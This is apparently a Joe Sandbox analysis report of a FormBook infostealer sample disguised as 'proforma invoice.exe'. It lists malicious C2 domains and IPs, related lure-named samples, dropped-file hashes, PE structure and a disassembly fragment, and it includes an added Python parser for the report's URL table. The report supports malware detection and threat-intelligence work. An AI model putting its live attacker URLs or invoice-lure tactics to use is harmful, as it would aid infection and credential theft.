| http://i1.cdn-image.com/__media__/js/min.js?v2.3 | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png | clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
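In the text export of this report the Name, Source and Malicious cells of the URL table run together on one line (for example "...parkingweclip.exe, 00000003....sdmpfalse"), and URL names longer than 100 characters are cut off. The following Python is an added example, not part of the Joe Sandbox report: it splits such fused rows back into URL, per-process memory-dump sources and the malicious flag, and then groups the URLs by the memory region they were carved from, which is what an analyst needs to tell strings found in the injected NpiZrjTdIDFUidJcY.exe region apart from strings in clip.exe. The process names are taken from the report's own process list; reading the fourth dot-separated field of a dump name as the region's base address, and treating a 100-character name as truncated, are assumptions made for this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Process names from the report's process list. The fused rows can only be split
# reliably if the parser knows which names mark the start of the Source cell.
PROCESSES = ("clip.exe", "NpiZrjTdIDFUidJcY.exe")

# Dump file names in the report are eight dot-separated hex/decimal fields + ".sdmp".
_DUMP = r"(?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+\.sdmp"

# Constructed sample input: three rows copied verbatim from the table above.
RAW_ROWS = [
    "https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse",
    "http://www.dmtxwuatbz.ccNpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpfalse",
    "https://www.ecosia.org/newtab/clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse",
]


@dataclass(frozen=True)
class Source:
    process: str
    dump: str
    base: int  # 4th field of the dump name read as a hex address (assumption)


@dataclass
class UrlRecord:
    url: str
    malicious: bool
    sources: list
    truncated: bool  # name hit the export's length limit; not an exact indicator


def _patterns(processes):
    proc = "|".join(re.escape(p) for p in processes)
    # Non-greedy URL, then one or more "<process>, <dump>" pairs, then the flag.
    # The non-greedy URL makes the split happen at the FIRST known process name,
    # so "...parkingweclip.exe" is cut before "clip.exe", not earlier.
    row_re = re.compile(
        rf"^(?P<url>.+?)(?P<sources>(?:(?:{proc}), {_DUMP}(?:, )?)+)(?P<mal>true|false)$"
    )
    src_re = re.compile(rf"(?P<process>{proc}), (?P<dump>{_DUMP})")
    return row_re, src_re


def parse_rows(rows, processes=PROCESSES, name_limit=100):
    """Turn fused 'Name+Source+Malicious' lines into UrlRecord objects."""
    row_re, src_re = _patterns(processes)
    records = []
    for row in rows:
        m = row_re.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised row: {row[:60]}...")
        sources = []
        for s in src_re.finditer(m.group("sources")):
            fields = s.group("dump").split(".")
            sources.append(Source(s.group("process"), s.group("dump"), int(fields[3], 16)))
        url = m.group("url")
        records.append(
            UrlRecord(url, m.group("mal") == "true", sources, len(url) >= name_limit)
        )
    return records


def urls_by_region(records):
    """Map (process, base address) -> set of URLs carved from that region."""
    regions = defaultdict(set)
    for rec in records:
        for src in rec.sources:
            regions[(src.process, src.base)].add(rec.url)
    return dict(regions)


if __name__ == "__main__":
    recs = parse_rows(RAW_ROWS)
    for (proc, base), urls in sorted(urls_by_region(recs).items()):
        print(f"{proc} @ 0x{base:08X}: {len(urls)} URL(s)")
    for rec in recs:
        if rec.truncated:
            print("truncated name, do not use as exact IOC:", rec.url)
```

Truncated names are flagged rather than dropped: they still identify the host, but they must not be pushed into a blocklist as exact URLs.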
| IP | Domain | Country | ASN | ASN Name | Malicious |
| 23.251.54.212 | www.anuts.top | United States | 62468 | VPSQUANUS | true |
| 172.67.210.102 | www.dmtxwuatbz.cc | United States | 13335 | CLOUDFLARENETUS | true |
| 213.145.228.16 | www.sandranoll.com | Austria | 25575 | DOMAINTECHNIKAT | true |
| 194.9.94.85 | www.xn--matfrmn-jxa4m.se | Sweden | 39570 | LOOPIASE | true |
| 5.44.111.162 | www.hprlz.cz | Germany | 45031 | PROVIDERBOXIPv4IPv6DUS1DE | true |
| 217.160.0.106 | www.catherineviskadi.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true |
| 208.91.197.27 | www.bfiworkerscomp.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true |
| 91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true |
| 199.192.19.19 | www.telwisey.info | United States | 22612 | NAMECHEAP-NETUS | true |
| 43.252.167.188 | www.xn--fhq1c541j0zr.com | Hong Kong | 38277 | CLINK-AS-APCommuniLinkInternetLimitedHK | true |
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1497807
                Start date and time:2024-08-23 04:17:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 55s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:proforma invoice.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/5@14/10
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 47
                • Number of non-executed functions: 298
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
| 22:18:50 | API Interceptor | 12138527x Sleep call for process: clip.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 23.251.54.212 | Arrival Notice.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | shipping documents.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | MV Sunshine, ORDER.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | LisectAVT_2403002B_466.exe | malicious | FormBook | www.anuts.top/d5fo/ |
| 23.251.54.212 | TOgpmvvWoj.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | Attendance list.exe | malicious | FormBook | www.anuts.top/li0t/ |
| 23.251.54.212 | Payment_Advice.pdf.exe | malicious | FormBook | www.anuts.top/niik/ |
| 23.251.54.212 | BL7247596940.pdf.exe | malicious | FormBook | www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU= |
| 23.251.54.212 | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | www.anuts.top/niik/ |
| 172.67.210.102 | shipping documents.exe | malicious | FormBook | www.dmtxwuatbz.cc/lfkn/ |
| 172.67.210.102 | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | www.dmtxwuatbz.cc/lfkn/ |
| 172.67.210.102 | TOgpmvvWoj.exe | malicious | FormBook | www.dmtxwuatbz.cc/lfkn/ |
| 172.67.210.102 | Attendance list.exe | malicious | FormBook | www.dmtxwuatbz.cc/lfkn/ |
| 213.145.228.16 | Arrival Notice.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | shipping documents.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | MV Sunshine, ORDER.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | LisectAVT_2403002A_87.exe | malicious | FormBook | www.sandranoll.com/4bud/ |
| 213.145.228.16 | bJrO2iUerN.elf | malicious | Unknown | strg.or.at/wordpress/wp-login.php |
| 213.145.228.16 | TOgpmvvWoj.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | Attendance list.exe | malicious | FormBook | www.sandranoll.com/aroo/ |
| 213.145.228.16 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.sandranoll.com/zg5v/ |
| 213.145.228.16 | Swift Message.pdf.exe | malicious | FormBook | www.sandranoll.com/cga5/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| www.dmtxwuatbz.cc | Arrival Notice.exe | malicious | FormBook | 104.21.45.56 |
| www.dmtxwuatbz.cc | shipping documents.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | MV Sunshine, ORDER.exe | malicious | FormBook | 104.21.45.56 |
| www.dmtxwuatbz.cc | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | TOgpmvvWoj.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | Attendance list.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | Swift Copy #U00a362,271.03.Pdf.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | PO-104678522.exe | malicious | FormBook | 172.67.210.102 |
| www.dmtxwuatbz.cc | NEW ORDER-RFQ#10112023Q4.exe | malicious | FormBook | 104.21.45.56 |
| www.dmtxwuatbz.cc | NEW ORDER 75647839384.exe | malicious | FormBook | 104.21.45.56 |
| www.sandranoll.com | Arrival Notice.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | shipping documents.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | MV Sunshine, ORDER.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | LisectAVT_2403002A_87.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | TOgpmvvWoj.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | Attendance list.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16 |
| www.sandranoll.com | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16 |
| www.xn--matfrmn-jxa4m.se | Arrival Notice.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | shipping documents.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | MV Sunshine, ORDER.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | docs_pdf.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | Attendance list.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | D7KV2Z73zC.rtf | malicious | FormBook | 194.9.94.85 |
| www.xn--matfrmn-jxa4m.se | Scan Doc.docx.doc | malicious | FormBook | 194.9.94.85 |
| www.catherineviskadi.com | Arrival Notice.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | shipping documents.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | MV Sunshine, ORDER.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | docs_pdf.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | TOgpmvvWoj.exe | malicious | FormBook | 217.160.0.106 |
| www.catherineviskadi.com | Attendance list.exe | malicious | FormBook | 217.160.0.106 |
                | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                | --- | --- | --- | --- | --- |
                | DOMAINTECHNIKAT | Arrival Notice.exe | malicious | FormBook | 213.145.228.16 |
                |  | shipping documents.exe | malicious | FormBook | 213.145.228.16 |
                |  | MV Sunshine, ORDER.exe | malicious | FormBook | 213.145.228.16 |
                |  | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 213.145.228.16 |
                |  | LisectAVT_2403002A_87.exe | malicious | FormBook | 213.145.228.16 |
                |  | bJrO2iUerN.elf | malicious | Unknown | 213.145.228.16 |
                |  | TOgpmvvWoj.exe | malicious | FormBook | 213.145.228.16 |
                |  | Attendance list.exe | malicious | FormBook | 213.145.228.16 |
                |  | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16 |
                |  | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16 |
                | CLOUDFLARENETUS | https://www.netskopesecuritycheck.com/ | malicious | Unknown | 1.1.1.1 |
                |  | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3 |
                |  | 8468281651.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3 |
                |  | file.exe | malicious | LummaC, Vidar | 188.114.97.3 |
                |  | https://k-trade-hub.vercel.app/?web=kdjung3@hdel.co.kr | malicious | Unknown | 104.17.25.14 |
                |  | cum.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 162.159.135.232 |
                |  | BAH.xls | malicious | Unknown | 162.159.137.9 |
                |  | http://meta-help.pages.dev/twenty.html | malicious | Unknown | 172.64.153.29 |
                |  | http://groupsextelegram.pages.dev/favicon.ico/link-1 | malicious | Unknown | 188.114.97.3 |
                |  | http://telegramgirlshorny.pages.dev/ | malicious | Unknown | 104.17.25.14 |
                | VPSQUANUS | Arrival Notice.exe | malicious | FormBook | 23.251.54.212 |
                |  | shipping documents.exe | malicious | FormBook | 23.251.54.212 |
                |  | MV Sunshine, ORDER.exe | malicious | FormBook | 23.251.54.212 |
                |  | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 23.251.54.212 |
                |  | v9.exe | malicious | Unknown | 154.222.224.99 |
                |  | 1.exe | malicious | Unknown | 154.222.224.99 |
                |  | v9.exe | malicious | Unknown | 154.222.224.99 |
                |  | bot.x86.elf | malicious | Mirai, Okiru | 69.165.74.76 |
                |  | bot.m68k.elf | malicious | Mirai, Okiru | 69.165.74.76 |
                |  | bot.arm7.elf | malicious | Mirai, Okiru | 69.165.74.76 |
                | LOOPIASE | Arrival Notice.exe | malicious | FormBook | 194.9.94.85 |
                |  | shipping documents.exe | malicious | FormBook | 194.9.94.85 |
                |  | MV Sunshine, ORDER.exe | malicious | FormBook | 194.9.94.85 |
                |  | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 194.9.94.85 |
                |  | http://tok2np0cklt.top/ | malicious | Unknown | 194.9.94.85 |
                |  | docs_pdf.exe | malicious | FormBook | 194.9.94.85 |
                |  | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85 |
                |  | Attendance list.exe | malicious | FormBook | 194.9.94.85 |
                |  | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85 |
                |  | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.86 |
                No context
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category:dropped
                Size (bytes):114688
                Entropy (8bit):0.9746603542602881
                Encrypted:false
                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5:780853CDDEAEE8DE70F28A4B255A600B
                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious:false
                Reputation:high, very likely benign file
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993733048425197
                Encrypted:true
                SSDEEP:6144:gGMCHOeyOhvtdmzotQi7omjjU9AzuEja7pIFw:gGMYyOhvuo+IomEd4Bw
                MD5:81D057B1AC360DD8069E3F2BD4733088
                SHA1:0FA44CB9A89C387909409C7F4C4E1FE16522B572
                SHA-256:83BF3620FBE8C97F5DF54A87FAD458C0CAC9CF30162E7E4E474398FB980CA667
                SHA-512:17F04D2C81713FF251469FB383988B34C5BF2538D686A7FF2809BF950A608752FC4205D60DAAD552935EEE87CEB40A7E71B92FA93EBA351515A136EACEFE6414
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):43672
                Entropy (8bit):7.820005416737383
                Encrypted:false
                SSDEEP:768:jt05sBKLqjyJCMRHYLi4dba6+BdMmIgQ75+0vcyGvb9rLvomDVJ6Qw+:jq+2qjYHYLXR+fXIgspCvb9r0oUQP
                MD5:74A84DBDD1A8E46DFD07A5A5C3A459CC
                SHA1:8E60485A1C708D51B65C34C31EC56E17006C5A90
                SHA-256:B3CC10FF64AB44570D83324AD954D80BFD07F23D18269863F71DF81C9284BF42
                SHA-512:54474611AAC5212D0A0CFAC40C2F0BD5255C3555C194D424D7DE042F8CB33B5F5F9B9739663C6C19FDF1820FCA5DA85DC5888D88F4645406AD556A28DDC227A0
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):86022
                Entropy (8bit):4.180140028656108
                Encrypted:false
                SSDEEP:1536:/19Qqf0F14BYFVjis+NeU1FvNf4VGvCcgiZa/4NUX6w6ybsH5M:pSg1eXOpZq0y
                MD5:06229991C7E311642A6A258178377295
                SHA1:CEBFFB5E77945ABA26A6ED2147248B9ABAA42B93
                SHA-256:126B55211A09E94EDE4EFF05846791A5F31A2A1BCBBADD4961B7E27CA4E8AC2D
                SHA-512:FABDC481D96608C9CC5144CEDAF77D0614FD22E98DD1448FA8EE76D8C69C6B239B25C2B51390ADAEDDFA9474AB2D7B1E074C617B6A7567A512475434A7B3FA96
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993733048425197
                Encrypted:true
                SSDEEP:6144:gGMCHOeyOhvtdmzotQi7omjjU9AzuEja7pIFw:gGMYyOhvuo+IomEd4Bw
                MD5:81D057B1AC360DD8069E3F2BD4733088
                SHA1:0FA44CB9A89C387909409C7F4C4E1FE16522B572
                SHA-256:83BF3620FBE8C97F5DF54A87FAD458C0CAC9CF30162E7E4E474398FB980CA667
                SHA-512:17F04D2C81713FF251469FB383988B34C5BF2538D686A7FF2809BF950A608752FC4205D60DAAD552935EEE87CEB40A7E71B92FA93EBA351515A136EACEFE6414
                Malicious:false
                Reputation:low
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.133041790424472
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:proforma invoice.exe
                File size:1'248'256 bytes
                MD5:77f8da00f3632972d585ff7efb0bea8c
                SHA1:987ce549f5b8bb619bd78e5f88ae3cd132bb8f34
                SHA256:aab17e4d4fcb75ffc655247c8f71df23d653b9b573d87eb2e32c589c543918f9
                SHA512:5b18f05dcb866aad05c25f792f3646c75444a3daf7abb52b2b5331c2a6764c9affea90735d0061d615f0a2c55226262d08b59c98c3c7cbe44528c621fd1fac16
                SSDEEP:24576:fqDEvCTbMWu7rQYlBQcBiT6rprG8aEnfOYbNoY5cap:fTvC/MTQYxsWR7aEfOYbNs
                TLSH:2945BF0273C1C022FFAB91734B9AF6115BBC69660123E62F13A81D79BE705B1563E763
                Icon Hash:aaf3e3e3938382a0
                Entrypoint:0x420577
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66C7BF2E [Thu Aug 22 22:43:58 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:948cc502fe9226992dce9417f952fce3
                Instruction
                call 00007FDE00B0EA13h
                jmp 00007FDE00B0E31Fh
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007FDE00B0E4FDh
                mov dword ptr [esi], 0049FDF0h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FDF8h
                mov dword ptr [ecx], 0049FDF0h
                ret
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007FDE00B0E4CAh
                mov dword ptr [esi], 0049FE0Ch
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FE14h
                mov dword ptr [ecx], 0049FE0Ch
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                and dword ptr [eax], 00000000h
                and dword ptr [eax+04h], 00000000h
                push eax
                mov eax, dword ptr [ebp+08h]
                add eax, 04h
                push eax
                call 00007FDE00B110BDh
                pop ecx
                pop ecx
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 0049FDD0h
                push eax
                call 00007FDE00B11108h
                pop ecx
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                push eax
                call 00007FDE00B110F1h
                test byte ptr [ebp+08h], 00000001h
                pop ecx
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                | Name | Virtual Address | Virtual Size | Is in Section |
                | --- | --- | --- | --- |
                | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
                | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5a084 | .rsrc |
                | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12f000 | 0x7594 | .reloc |
                | IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
                | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
                | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
                | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
                | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
                | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
                | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                | .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                | .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                | .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                | .rsrc | 0xd4000 | 0x5a084 | 0x5a200 | 93f46011492adb707c438e83845c59cf | False | 0.9267239511095701 | data | 7.892962717251277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                | .reloc | 0x12f000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
                | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                | --- | --- | --- | --- | --- | --- | --- |
                | RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
                | RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
                | RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
                | RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
                | RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
                | RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
                | RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
                | RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
                | RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
                | RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
                | RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
                | RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9 |
                | RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
